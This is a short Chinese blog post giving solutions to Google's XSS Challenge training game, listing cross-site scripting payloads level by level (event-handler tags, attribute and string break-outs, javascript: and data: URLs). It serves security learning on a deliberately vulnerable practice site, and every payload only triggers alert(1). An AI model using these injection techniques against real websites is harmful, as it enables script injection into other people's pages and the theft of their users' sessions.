搜索

分享

QQ空间 QQ好友新浪微博微信

Google XSS Challenge

Coder编程 2020-08-30

展开全文

https://xss-game./level1

https://xss-game./level1

payload: <svg onload=alert(1)>

https://xss-game./level2

过滤掉了<script>关键词

payloads:

<svg onload=alert(1)>

<input autofocus onfocus=alert(1)>

<video><source onerror="JavaScript:alert(1)">

<marquee onstart=alert(1)>

https://xss-game./level3

payload1: ' onerror='alert(1)' >

payload2: ' onmouseover=alert(1)//

https://xss-game./level4

sourcecode:

<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />

payload1: 5'),alert('1

payload2: 5'),alert('1')//

https://xss-game./level5

payload: javascript:alert(1)

https://xss-game./level6

payload: https://xss-game./level6/frame#data:text/plain,alert('1')

本站是提供个人知识管理的网络存储空间，所有内容均由用户发布，不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息，谨防诈骗。如发现有害或侵权内容，请点击一键举报。

转藏分享

QQ空间 QQ好友新浪微博微信

献花（0） +1

来自： Coder编程 > 《待分类》

举报/认领

0条评论

请遵守用户评论公约

类似文章 更多

Coder编程

关注对话

TA的最新馆藏

shell脚本基础-2
linux查看文件大小
Controller报错: java.lang.NoSuchMethodException: java.util.List.<init>()
Vue3: does not provide an export named 'createRouter'
JavaSE常用类之Instant类及常用方法
定位特点

喜欢该文的人也喜欢更多

热门阅读换一换